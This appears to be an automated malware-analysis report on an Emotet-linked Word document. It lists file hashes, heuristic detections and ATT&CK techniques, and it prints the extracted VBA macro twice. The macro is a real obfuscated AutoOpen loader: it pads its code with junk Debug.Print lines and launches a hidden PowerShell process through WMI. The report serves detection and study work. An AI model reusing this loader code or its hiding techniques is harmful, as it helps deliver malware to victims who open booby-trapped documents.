Emotet Office (OLE) malware analysis — malicious · 626b76832c929a86

MALICIOUS

Office (OLE)

124.9 KB Created: 2019-05-22 06:53:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 3ce00fa0dedcd127135bb8585e333dc4 SHA-1: 52cd591d7e911ceafd8b4954fd93c2b8207ea22a SHA-256: 626b76832c929a86747ae5d2a08d4d36e2bacb5927202003a122713e0af4295c

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, and ClamAV identifies it as Emotet. The VBA macro uses GetObject and Shell execution, indicating it's designed to download and execute a second-stage payload. The presence of an AutoOpen macro further supports its malicious intent.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3816 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3816 bytes
SHA-256: `c66ff62d045cf33957334afcf5c35a01423cacf09bad1c786ff8902559de5ecc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "woOnJRqH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "LM2Pc1, 0, 0, MSForms, TextBox" Attribute VB_Control = "Iivkld, 1, 1, MSForms, TextBox" Attribute VB_Name = "Sqs5zV" Sub jTwuqo() Debug.Print "545" + ("20") + ("HutlAa" + ("259" + "252") + "PJaFNS" + ("zZsNKP")) Debug.Print "408" + ("836") + ("dzhWzP8j" + ("891" + "849") + "a6sK89oF" + ("oYBDm8k")) Debug.Print "472" + ("194") + ("XqLn8XL" + ("133" + "695") + "DF5wf_T" + ("m1EAIV")) Debug.Print "912" + ("948") + ("jVEZ771" + ("533" + "112") + "HVPdI4" + ("DFocqM")) Debug.Print "108" + ("714") + ("m6MTZ8n" + ("379" + "886") + "zA3RnQNl" + ("TCsZV_")) Debug.Print "896" + ("397") + ("KRJXh_17" + ("298" + "845") + "wbHEwKC7" + ("XJW4i6")) End Sub Sub _ autoopen( _ ) Debug.Print "743" + ("6") + ("Kj14dGI" + ("504" + "410") + "kEUc2D" + ("zzTPmT")) Debug.Print "38" + ("879") + ("ElGJ7k" + ("307" + "609") + "QR_M5E_6" + ("ntzsrm5R")) Debug.Print "222" + ("571") + ("sMUVBj" + ("137" + "734") + "lG0qzG" + ("QIbjiWw")) iaEZC7 Debug.Print "106" + ("713") + ("PGJ50a" + ("327" + "960") + "jDA1w2j" + ("S8Faon")) Debug.Print "519" + ("936") + ("IAIbok" + ("146" + "818") + "EjZCYUSC" + ("iU_iJINq")) Debug.Print "516" + ("274") + ("ipffinX" + ("251" + "624") + "OFwiCC" + ("YF_o1Al")) End Sub Sub iaEZC7() Debug.Print "103" + ("124") + ("Lu3ZzU" + ("803" + "713") + "vw8dwrfp" + ("vu08Lz")) Debug.Print "416" + ("962") + ("jDfTqD" + ("626" + "751") + "AwDIzfM" + ("ZUc3OR")) Debug.Print "485" + ("763") + ("A61AjR" + ("871" + "306") + "mEu76KJr" + ("jm93O_")) Set l2qCThC3 = GetObject(Aa11cU("wInmGmts:Wi" + Aa11cU("n32_Processstartup"))) Debug.Print "214" + ("903") + ("uAVdL_6" + ("766" + "256") + "E5CYTcDv" + ("fCVqi9Kb")) Debug.Print "441" + ("818") + ("EdM3Bz" + ("377" + "275") + "RFMlwBVz" + ("ocS0Az")) Debug.Print "697" + ("37") + ("qVQ4zkL" + ("455" + "426") + "RsqsPi4" + ("Eppiao")) l2qCThC3. _ ShowWindow = 149149 _ - 149149 Debug.Print "789" + ("958") + ("zF8Tf5n" + ("953" + "313") + "fz4SL1to" + ("dWGt1T")) Debug.Print "72" + ("877") + ("aS1AjOzi" + ("909" + "182") + "PWiNb5G" + ("Q8jYu2")) Debug.Print "585" + ("657") + ("DWMUU93" + ("775" + "951") + "mvbKDv" + ("tLwC2MV")) Set kT0uWO = GetObject(Aa11cU("WinmGmts:Wi" + Aa11cU("n32_Process"))) Debug.Print "615" + ("147") + ("FT32kPO" + ("708" + "743") + "fTIlCl" + ("IFsWPp")) Debug.Print "419" + ("325") + ("Tf1Z34" + ("258" + "957") + "uqaOw6v_" + ("GXcFET")) Debug.Print "408" + ("940") + ("I6iiWZ" + ("341" + "207") + "RFKUKi" + ("cU5aYpB")) kT0uWO.Create RidTUPq0 + Aa11cU("pOwe") + sZkiiqrC + woOnJRqH.Iivkld + woOnJRqH.LM2Pc1 + vko7YS, b5jVWl35, l2qCThC3, n6pLWz Debug.Print "670" + ("239") + ("ljcFhC" + ("225" + "701") + "DpTz0m" + ("hqliUuA")) Debug.Print "110" + ("437") + ("oQn_pz" + ("32" + "979") + "zAYP9pE" + ("GfiGlJr")) Debug.Print "164" + ("193") + ("VlAkru" + ("449" + "658") + "wni_rp" + ("SF7S1G")) End Sub Function Aa11cU(rw7tnH) Debug.Print "57" + ("132") + ("pAoaClG" + ("833" + "105") + "ffOEjBRj" + ("Fsuo_h")) Debug.Print "989" + ("223") + ("ObKkGsi" + ("797" + "739") + "hiF6nA1" + ("ojhbqS")) Debug.Print "904" + ("784") + ("Fm5IfK" + ("331" + "654") + "Zi1SidNp" + ("bJ__ut6")) Aa11cU = qvwqb9vV + rw7tnH + PW3btSuO Debug.Print "386" + ("426") + ("JDlXqE" + ("633" + "949") + "qEcbBnB" + ("t7RfXj")) Debug.Print "590" + ("103") + ("VSWMjYof" + ("756" + "800") + "zA64hP" + ("zjAPmR5j")) Debug.Print "217" + ("809") + ("TEYRd37C" + ("373" + "118") + "vp7QlfC" + ("O72RGk")) End Function Attribute VB_Name = "P8sS27"

SHA-256: c66ff62d045cf33957334afcf5c35a01423cacf09bad1c786ff8902559de5ecc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "woOnJRqH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "LM2Pc1, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Iivkld, 1, 1, MSForms, TextBox"

Attribute VB_Name = "Sqs5zV"
Sub jTwuqo()
   Debug.Print "545" + ("20") + ("HutlAa" + ("259" + "252") + "PJaFNS" + ("zZsNKP"))
Debug.Print "408" + ("836") + ("dzhWzP8j" + ("891" + "849") + "a6sK89oF" + ("oYBDm8k"))
Debug.Print "472" + ("194") + ("XqLn8XL" + ("133" + "695") + "DF5wf_T" + ("m1EAIV"))
   Debug.Print "912" + ("948") + ("jVEZ771" + ("533" + "112") + "HVPdI4" + ("DFocqM"))
Debug.Print "108" + ("714") + ("m6MTZ8n" + ("379" + "886") + "zA3RnQNl" + ("TCsZV_"))
Debug.Print "896" + ("397") + ("KRJXh_17" + ("298" + "845") + "wbHEwKC7" + ("XJW4i6"))
End Sub
Sub _
autoopen( _
)
   Debug.Print "743" + ("6") + ("Kj14dGI" + ("504" + "410") + "kEUc2D" + ("zzTPmT"))
Debug.Print "38" + ("879") + ("ElGJ7k" + ("307" + "609") + "QR_M5E_6" + ("ntzsrm5R"))
Debug.Print "222" + ("571") + ("sMUVBj" + ("137" + "734") + "lG0qzG" + ("QIbjiWw"))
iaEZC7
   Debug.Print "106" + ("713") + ("PGJ50a" + ("327" + "960") + "jDA1w2j" + ("S8Faon"))
Debug.Print "519" + ("936") + ("IAIbok" + ("146" + "818") + "EjZCYUSC" + ("iU_iJINq"))
Debug.Print "516" + ("274") + ("ipffinX" + ("251" + "624") + "OFwiCC" + ("YF_o1Al"))
End Sub
Sub iaEZC7()
   Debug.Print "103" + ("124") + ("Lu3ZzU" + ("803" + "713") + "vw8dwrfp" + ("vu08Lz"))
Debug.Print "416" + ("962") + ("jDfTqD" + ("626" + "751") + "AwDIzfM" + ("ZUc3OR"))
Debug.Print "485" + ("763") + ("A61AjR" + ("871" + "306") + "mEu76KJr" + ("jm93O_"))
Set l2qCThC3 = GetObject(Aa11cU("wInmGmts:Wi" + Aa11cU("n32_Processstartup")))
   Debug.Print "214" + ("903") + ("uAVdL_6" + ("766" + "256") + "E5CYTcDv" + ("fCVqi9Kb"))
Debug.Print "441" + ("818") + ("EdM3Bz" + ("377" + "275") + "RFMlwBVz" + ("ocS0Az"))
Debug.Print "697" + ("37") + ("qVQ4zkL" + ("455" + "426") + "RsqsPi4" + ("Eppiao"))
l2qCThC3. _
ShowWindow = 149149 _
- 149149
   Debug.Print "789" + ("958") + ("zF8Tf5n" + ("953" + "313") + "fz4SL1to" + ("dWGt1T"))
Debug.Print "72" + ("877") + ("aS1AjOzi" + ("909" + "182") + "PWiNb5G" + ("Q8jYu2"))
Debug.Print "585" + ("657") + ("DWMUU93" + ("775" + "951") + "mvbKDv" + ("tLwC2MV"))
Set kT0uWO = GetObject(Aa11cU("WinmGmts:Wi" + Aa11cU("n32_Process")))
   Debug.Print "615" + ("147") + ("FT32kPO" + ("708" + "743") + "fTIlCl" + ("IFsWPp"))
Debug.Print "419" + ("325") + ("Tf1Z34" + ("258" + "957") + "uqaOw6v_" + ("GXcFET"))
Debug.Print "408" + ("940") + ("I6iiWZ" + ("341" + "207") + "RFKUKi" + ("cU5aYpB"))
kT0uWO.Create RidTUPq0 + Aa11cU("pOwe") + sZkiiqrC + woOnJRqH.Iivkld + woOnJRqH.LM2Pc1 + vko7YS, b5jVWl35, l2qCThC3, n6pLWz
   Debug.Print "670" + ("239") + ("ljcFhC" + ("225" + "701") + "DpTz0m" + ("hqliUuA"))
Debug.Print "110" + ("437") + ("oQn_pz" + ("32" + "979") + "zAYP9pE" + ("GfiGlJr"))
Debug.Print "164" + ("193") + ("VlAkru" + ("449" + "658") + "wni_rp" + ("SF7S1G"))
End Sub
Function Aa11cU(rw7tnH)
   Debug.Print "57" + ("132") + ("pAoaClG" + ("833" + "105") + "ffOEjBRj" + ("Fsuo_h"))
Debug.Print "989" + ("223") + ("ObKkGsi" + ("797" + "739") + "hiF6nA1" + ("ojhbqS"))
Debug.Print "904" + ("784") + ("Fm5IfK" + ("331" + "654") + "Zi1SidNp" + ("bJ__ut6"))
Aa11cU = qvwqb9vV + rw7tnH + PW3btSuO
   Debug.Print "386" + ("426") + ("JDlXqE" + ("633" + "949") + "qEcbBnB" + ("t7RfXj"))
Debug.Print "590" + ("103") + ("VSWMjYof" + ("756" + "800") + "zA64hP" + ("zjAPmR5j"))
Debug.Print "217" + ("809") + ("TEYRd37C" + ("373" + "118") + "vp7QlfC" + ("O72RGk"))
End Function


Attribute VB_Name = "P8sS27"

Open this report in the interactive analyzer, or submit your own file for analysis.